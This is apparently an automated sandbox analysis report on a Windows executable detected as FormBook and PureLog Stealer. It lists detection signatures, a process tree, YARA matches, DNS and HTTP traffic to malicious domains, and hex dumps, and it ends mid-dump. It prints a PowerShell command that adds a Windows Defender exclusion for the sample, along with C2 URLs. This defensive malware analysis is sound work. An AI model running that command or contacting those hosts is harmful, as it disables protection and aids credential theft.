Windows Analysis Report
W3MzrFzSF0.exe

Overview

General Information

Sample name: W3MzrFzSF0.exe
renamed because original name is a hash value
Original sample name: 122baa2b0520a7dd37025a89bccf9fcaf87f99519bfc0ec84a4a48cddb6f9b6d.exe
Analysis ID: 1563494
MD5: 44ae4c9c2ab6623c0c1d04bb8b81871e
SHA1: efdd834862890028d1b52e2076ff5f78c84754c5
SHA256: 122baa2b0520a7dd37025a89bccf9fcaf87f99519bfc0ec84a4a48cddb6f9b6d

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • W3MzrFzSF0.exe (PID: 3496 cmdline: "C:\Users\user\Desktop\W3MzrFzSF0.exe" MD5: 44AE4C9C2AB6623C0C1D04BB8B81871E)
    • powershell.exe (PID: 7152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4760 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • vbc.exe (PID: 5632 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
      • pDqSqZXvqQcT.exe (PID: 4444 cmdline: "C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • pcaui.exe (PID: 6300 cmdline: "C:\Windows\SysWOW64\pcaui.exe" MD5: A8F63C86DEF45A7E48E7F7DF158CFAA9)
          • pDqSqZXvqQcT.exe (PID: 3812 cmdline: "C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5352 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.2172640781.00000000057E0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.4467731020.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.4467867908.00000000044F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.2068496606.0000000003D19000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.W3MzrFzSF0.exe.5670000.3.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
6.2.vbc.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0.2.W3MzrFzSF0.exe.5670000.3.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
6.2.vbc.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0.2.W3MzrFzSF0.exe.3d19970.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                      System Summary

                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\W3MzrFzSF0.exe", ParentImage: C:\Users\user\Desktop\W3MzrFzSF0.exe, ParentProcessId: 3496, ParentProcessName: W3MzrFzSF0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe", ProcessId: 7152, ProcessName: powershell.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\W3MzrFzSF0.exe", ParentImage: C:\Users\user\Desktop\W3MzrFzSF0.exe, ParentProcessId: 3496, ParentProcessName: W3MzrFzSF0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe", ProcessId: 7152, ProcessName: powershell.exe
                      No Suricata rule has matched

                      AV Detection

                      Source: http://www.acond-22-mvr.click/w9z4/, Avira URL Cloud: Label: malware
                      Source: http://www.acond-22-mvr.click/w9z4/?005PE=aNcLxhD894SLKl&lH_L4=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfbeeWLm23HuUFOBNObgSjIwBxlFn7Rit3IOIP+ZrZsKx+FQ==, Avira URL Cloud: Label: malware
                      Source: W3MzrFzSF0.exe, ReversingLabs: Detection: 42%
                      Source: W3MzrFzSF0.exe, Virustotal: Detection: 37%
                      Source: Yara match, File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 00000006.00000002.2172640781.00000000057E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000008.00000002.4467731020.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000008.00000002.4467867908.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000000A.00000002.4469698131.0000000004C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000007.00000002.4467776927.0000000004AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000006.00000002.2173692414.00000000083A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: W3MzrFzSF0.exe, Joe Sandbox ML: detected
                      Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: pcaui.exe, 00000008.00000002.4468565676.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4468773018.000000000501C000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000000.2258003464.00000000027FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2475852110.000000003848C000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: pcaui.pdb source: vbc.exe, 00000006.00000002.2172466807.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, pDqSqZXvqQcT.exe, 00000007.00000002.4467005035.0000000000558000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: BCYJ.pdb source: W3MzrFzSF0.exe
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pDqSqZXvqQcT.exe, 00000007.00000002.4467379967.00000000007EE000.00000002.00000001.01000000.0000000D.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467350657.00000000007EE000.00000002.00000001.01000000.0000000D.sdmp
                      Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2190258976.00000000045B7000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2187500778.00000000043FC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: BCYJ.pdbSHA256 source: W3MzrFzSF0.exe
                      Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, pcaui.exe, 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2190258976.00000000045B7000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2187500778.00000000043FC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: vbc.pdb source: pcaui.exe, 00000008.00000002.4468565676.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4468773018.000000000501C000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000000.2258003464.00000000027FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2475852110.000000003848C000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: System.Windows.Forms.pdb93405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: W3MzrFzSF0.exe, 00000000.00000002.2070763334.0000000005FE9000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: pcaui.pdbGCTL source: vbc.exe, 00000006.00000002.2172466807.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, pDqSqZXvqQcT.exe, 00000007.00000002.4467005035.0000000000558000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\pcaui.exe, Code function: 8_2_0281C920 FindFirstFileW,FindNextFileW,FindClose
                      Source: C:\Windows\SysWOW64\pcaui.exe, Code function: 4x nop then xor eax, eax (8_2_02809E10)
                      Source: C:\Windows\SysWOW64\pcaui.exe, Code function: 4x nop then mov ebx, 00000004h (8_2_046604E8)

                      Networking

                      Source: DNS query: www.rtpterbaruwaktu3.xyz
                      Source: DNS query: www.54248711.xyz
                      Source: Joe Sandbox View, IP Address: 109.70.26.37
                      Source: Joe Sandbox View, IP Address: 209.74.77.109
                      Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: www.rtpterbaruwaktu3.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.70kdd.top
                      Source: global trafficDNS traffic detected: DNS query: www.acond-22-mvr.click
                      Source: global trafficDNS traffic detected: DNS query: www.smartcongress.net
                      Source: global trafficDNS traffic detected: DNS query: www.mrpokrovskii.pro
                      Source: global trafficDNS traffic detected: DNS query: www.ytsd88.top
                      Source: global trafficDNS traffic detected: DNS query: www.matteicapital.online
                      Source: global trafficDNS traffic detected: DNS query: www.llljjjiii.shop
                      Source: global trafficDNS traffic detected: DNS query: www.ampsamkok88.shop
                      Source: global trafficDNS traffic detected: DNS query: www.gogawithme.live
                      Source: global trafficDNS traffic detected: DNS query: www.54248711.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.canadavinreport.site
                      Source: global trafficDNS traffic detected: DNS query: www.questmatch.pro
                      Source: unknown, HTTP traffic detected: POST /klhq/ HTTP/1.1 | Host: www.70kdd.top | Accept: */* | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Origin: http://www.70kdd.top | Cache-Control: max-age=0 | Content-Length: 206 | Connection: close | Content-Type: application/x-www-form-urlencoded | Referer: http://www.70kdd.top/klhq/ | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Wed, 27 Nov 2024 00:25:22 GMT | server: LiteSpeed
                      Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 27 Nov 2024 00:25:39 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66e01838-94"
                      Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 27 Nov 2024 00:25:42 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66e01838-94"
                      Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 27 Nov 2024 00:25:45 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66e01838-94"
                      Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 27 Nov 2024 00:25:48 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66e01838-94"
                      Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html; charset=iso-8859-1 | content-length: 196 | date: Wed, 27 Nov 2024 00:26:10 GMT | server: LiteSpeed | x-tuned-by: N0C | connection: close
                      Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html; charset=iso-8859-1 | content-length: 196 | date: Wed, 27 Nov 2024 00:26:13 GMT | server: LiteSpeed | x-tuned-by: N0C | connection: close
                      Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html; charset=iso-8859-1 | content-length: 196 | date: Wed, 27 Nov 2024 00:26:15 GMT | server: LiteSpeed | x-tuned-by: N0C | connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Wed, 27 Nov 2024 00:26:18 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 00:27:02 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 00:27:05 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 00:27:10 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 00:28:04 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 00:28:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 